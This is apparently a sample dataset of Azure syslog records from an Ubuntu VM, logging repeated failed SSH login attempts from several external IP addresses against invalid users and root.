+9131,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:24:18,UbuntuDevEnv,2019-06-25 22:24:18,auth,UbuntuDevEnv,info,Disconnected from invalid user gp 107.175.127.237 port 47574 [preauth],44474,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gp,107.175.127.2,47574,,
+9132,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:24:18,UbuntuDevEnv,2019-06-25 22:24:18,auth,UbuntuDevEnv,info,Received disconnect from 107.175.127.237 port 47574:11: Bye Bye [preauth],44474,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,107.175.127.2,47574,,
+9133,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:24:19,UbuntuDevEnv,2019-06-25 22:24:18,auth,UbuntuDevEnv,info,Failed password for invalid user fwong from 152.250.252.179 port 36618 ssh2,44475,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fwong,152.250.252.1,36618,,
+9134,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:24:19,UbuntuDevEnv,2019-06-25 22:24:19,auth,UbuntuDevEnv,info,Disconnected from invalid user fwong 152.250.252.179 port 36618 [preauth],44475,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fwong,152.250.252.1,36618,,
+9135,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:24:19,UbuntuDevEnv,2019-06-25 22:24:19,auth,UbuntuDevEnv,info,Received disconnect from 152.250.252.179 port 36618:11: Bye Bye [preauth],44475,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,152.250.252.1,36618,,
+9136,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:24:35,UbuntuDevEnv,2019-06-25 22:24:34,auth,UbuntuDevEnv,info,Invalid user torrent from 178.62.54.79 port 39620,44551,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,torrent,178.62.54.7,39620,,
+9137,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:24:35,UbuntuDevEnv,2019-06-25 22:24:35,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,44551,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9138,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:24:35,UbuntuDevEnv,2019-06-25 22:24:35,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=178.62.54.79,44551,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,178.62.54.7,,0,
+9139,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:24:37,UbuntuDevEnv,2019-06-25 22:24:37,auth,UbuntuDevEnv,info,Failed password for invalid user torrent from 178.62.54.79 port 39620 ssh2,44551,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,torrent,178.62.54.7,39620,,
+9140,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:24:37,UbuntuDevEnv,2019-06-25 22:24:37,auth,UbuntuDevEnv,info,Disconnected from invalid user torrent 178.62.54.79 port 39620 [preauth],44551,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,torrent,178.62.54.7,39620,,
+9141,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:24:37,UbuntuDevEnv,2019-06-25 22:24:37,auth,UbuntuDevEnv,info,Received disconnect from 178.62.54.79 port 39620:11: Bye Bye [preauth],44551,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,178.62.54.7,39620,,
+9142,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:24:50,UbuntuDevEnv,2019-06-25 22:24:50,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=212.156.136.114  user=root,44602,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,212.156.136.1,,0,
+9143,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:24:52,UbuntuDevEnv,2019-06-25 22:24:51,auth,UbuntuDevEnv,info,Failed password for root from 212.156.136.114 port 38967 ssh2,44602,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,212.156.136.1,38967,,
+9144,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:24:52,UbuntuDevEnv,2019-06-25 22:24:51,auth,UbuntuDevEnv,info,Received disconnect from 212.156.136.114 port 38967:11: Bye Bye [preauth],44602,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,212.156.136.1,38967,,
+9145,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:24:52,UbuntuDevEnv,2019-06-25 22:24:51,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 212.156.136.114 port 38967 [preauth],44602,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,212.156.136.1,38967,,
+9146,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:25:56,UbuntuDevEnv,2019-06-25 22:25:56,auth,UbuntuDevEnv,info,Invalid user aaron from 178.62.54.79 port 55998,44837,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,aaron,178.62.54.7,55998,,
+9147,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:25:56,UbuntuDevEnv,2019-06-25 22:25:56,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=178.62.54.79,44837,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,178.62.54.7,,0,
+9148,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:25:56,UbuntuDevEnv,2019-06-25 22:25:56,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,44837,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9149,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:25:59,UbuntuDevEnv,2019-06-25 22:25:58,auth,UbuntuDevEnv,info,Failed password for invalid user aaron from 178.62.54.79 port 55998 ssh2,44837,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,aaron,178.62.54.7,55998,,
+9150,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:25:59,UbuntuDevEnv,2019-06-25 22:25:58,auth,UbuntuDevEnv,info,Disconnected from invalid user aaron 178.62.54.79 port 55998 [preauth],44837,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,aaron,178.62.54.7,55998,,
+9151,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:25:59,UbuntuDevEnv,2019-06-25 22:25:58,auth,UbuntuDevEnv,info,Received disconnect from 178.62.54.79 port 55998:11: Bye Bye [preauth],44837,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,178.62.54.7,55998,,
+9152,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:26:10,UbuntuDevEnv,2019-06-25 22:26:09,auth,UbuntuDevEnv,info,Invalid user test1 from 152.250.252.179 port 53360,44882,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test1,152.250.252.1,53360,,
+9153,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:26:10,UbuntuDevEnv,2019-06-25 22:26:09,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,44882,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9154,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:26:10,UbuntuDevEnv,2019-06-25 22:26:09,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=152.250.252.179,44882,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,152.250.252.1,,0,
+9155,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:26:12,UbuntuDevEnv,2019-06-25 22:26:12,auth,UbuntuDevEnv,info,Failed password for invalid user test1 from 152.250.252.179 port 53360 ssh2,44882,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test1,152.250.252.1,53360,,
+9156,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:26:12,UbuntuDevEnv,2019-06-25 22:26:12,auth,UbuntuDevEnv,info,Disconnected from invalid user test1 152.250.252.179 port 53360 [preauth],44882,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test1,152.250.252.1,53360,,
+9157,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:26:12,UbuntuDevEnv,2019-06-25 22:26:12,auth,UbuntuDevEnv,info,Received disconnect from 152.250.252.179 port 53360:11: Bye Bye [preauth],44882,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,152.250.252.1,53360,,
+9158,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:26:21,UbuntuDevEnv,2019-06-25 22:26:20,auth,UbuntuDevEnv,info,Invalid user sunil from 212.156.136.114 port 34783,44931,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sunil,212.156.136.1,34783,,
+9159,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:26:21,UbuntuDevEnv,2019-06-25 22:26:20,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=212.156.136.114,44931,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,212.156.136.1,,0,
+9160,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:26:21,UbuntuDevEnv,2019-06-25 22:26:20,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,44931,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9161,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:26:23,UbuntuDevEnv,2019-06-25 22:26:23,auth,UbuntuDevEnv,info,Failed password for invalid user sunil from 212.156.136.114 port 34783 ssh2,44931,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sunil,212.156.136.1,34783,,
+9162,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:26:23,UbuntuDevEnv,2019-06-25 22:26:23,auth,UbuntuDevEnv,info,Disconnected from invalid user sunil 212.156.136.114 port 34783 [preauth],44931,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sunil,212.156.136.1,34783,,
+9163,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:26:23,UbuntuDevEnv,2019-06-25 22:26:23,auth,UbuntuDevEnv,info,Received disconnect from 212.156.136.114 port 34783:11: Bye Bye [preauth],44931,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,212.156.136.1,34783,,
+9164,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:27:21,UbuntuDevEnv,2019-06-25 22:27:20,auth,UbuntuDevEnv,info,Invalid user lou from 178.62.54.79 port 44142,45143,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lou,178.62.54.7,44142,,
+9165,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:27:21,UbuntuDevEnv,2019-06-25 22:27:20,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=178.62.54.79,45143,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,178.62.54.7,,0,
+9166,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:27:21,UbuntuDevEnv,2019-06-25 22:27:20,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,45143,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9167,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:27:23,UbuntuDevEnv,2019-06-25 22:27:23,auth,UbuntuDevEnv,info,Failed password for invalid user lou from 178.62.54.79 port 44142 ssh2,45143,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lou,178.62.54.7,44142,,
+9168,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:27:23,UbuntuDevEnv,2019-06-25 22:27:23,auth,UbuntuDevEnv,info,Received disconnect from 178.62.54.79 port 44142:11: Bye Bye [preauth],45143,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,178.62.54.7,44142,,
+9169,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:27:23,UbuntuDevEnv,2019-06-25 22:27:23,auth,UbuntuDevEnv,info,Disconnected from invalid user lou 178.62.54.79 port 44142 [preauth],45143,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lou,178.62.54.7,44142,,
+9170,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:27:39,UbuntuDevEnv,2019-06-25 22:27:39,auth,UbuntuDevEnv,info,Connection reset by 139.199.113.140 port 51754 [preauth],44823,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.199.113.1,51754,,
+9171,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:27:51,UbuntuDevEnv,2019-06-25 22:27:51,auth,UbuntuDevEnv,info,Invalid user test1 from 139.199.113.140 port 37956,45247,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test1,139.199.113.1,37956,,
+9172,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:27:51,UbuntuDevEnv,2019-06-25 22:27:51,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.199.113.140,45247,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.199.113.1,,0,
+9173,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:27:51,UbuntuDevEnv,2019-06-25 22:27:51,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,45247,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9174,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:27:54,UbuntuDevEnv,2019-06-25 22:27:53,auth,UbuntuDevEnv,info,Failed password for invalid user test1 from 139.199.113.140 port 37956 ssh2,45247,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test1,139.199.113.1,37956,,
+9175,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:27:54,UbuntuDevEnv,2019-06-25 22:27:53,auth,UbuntuDevEnv,info,Received disconnect from 139.199.113.140 port 37956:11: Bye Bye [preauth],45247,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.199.113.1,37956,,
+9176,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:27:54,UbuntuDevEnv,2019-06-25 22:27:53,auth,UbuntuDevEnv,info,Disconnected from invalid user test1 139.199.113.140 port 37956 [preauth],45247,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test1,139.199.113.1,37956,,
+9177,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:27:55,UbuntuDevEnv,2019-06-25 22:27:55,auth,UbuntuDevEnv,info,Invalid user barbara from 212.156.136.114 port 32460,45261,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,barbara,212.156.136.1,32460,,
+9178,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:27:55,UbuntuDevEnv,2019-06-25 22:27:55,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=212.156.136.114,45261,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,212.156.136.1,,0,
+9179,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:27:55,UbuntuDevEnv,2019-06-25 22:27:55,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,45261,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9180,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:27:57,UbuntuDevEnv,2019-06-25 22:27:56,auth,UbuntuDevEnv,info,Failed password for invalid user barbara from 212.156.136.114 port 32460 ssh2,45261,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,barbara,212.156.136.1,32460,,
+9181,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:27:57,UbuntuDevEnv,2019-06-25 22:27:56,auth,UbuntuDevEnv,info,Received disconnect from 212.156.136.114 port 32460:11: Bye Bye [preauth],45261,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,212.156.136.1,32460,,
+9182,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:27:57,UbuntuDevEnv,2019-06-25 22:27:56,auth,UbuntuDevEnv,info,Disconnected from invalid user barbara 212.156.136.114 port 32460 [preauth],45261,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,barbara,212.156.136.1,32460,,
+9183,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:28:05,UbuntuDevEnv,2019-06-25 22:28:05,auth,UbuntuDevEnv,info,Invalid user tiao from 152.250.252.179 port 41896,45295,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tiao,152.250.252.1,41896,,
+9184,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:28:05,UbuntuDevEnv,2019-06-25 22:28:05,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,45295,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9185,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:28:05,UbuntuDevEnv,2019-06-25 22:28:05,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=152.250.252.179,45295,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,152.250.252.1,,0,
+9186,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:28:08,UbuntuDevEnv,2019-06-25 22:28:07,auth,UbuntuDevEnv,info,Failed password for invalid user tiao from 152.250.252.179 port 41896 ssh2,45295,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tiao,152.250.252.1,41896,,
+9187,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:28:08,UbuntuDevEnv,2019-06-25 22:28:08,auth,UbuntuDevEnv,info,Received disconnect from 152.250.252.179 port 41896:11: Bye Bye [preauth],45295,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,152.250.252.1,41896,,
+9188,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:28:08,UbuntuDevEnv,2019-06-25 22:28:08,auth,UbuntuDevEnv,info,Disconnected from invalid user tiao 152.250.252.179 port 41896 [preauth],45295,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tiao,152.250.252.1,41896,,
+9189,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:28:41,UbuntuDevEnv,2019-06-25 22:28:41,auth,UbuntuDevEnv,info,Invalid user chandru from 178.62.54.79 port 60518,45429,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,chandru,178.62.54.7,60518,,
+9190,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:28:41,UbuntuDevEnv,2019-06-25 22:28:41,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,45429,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
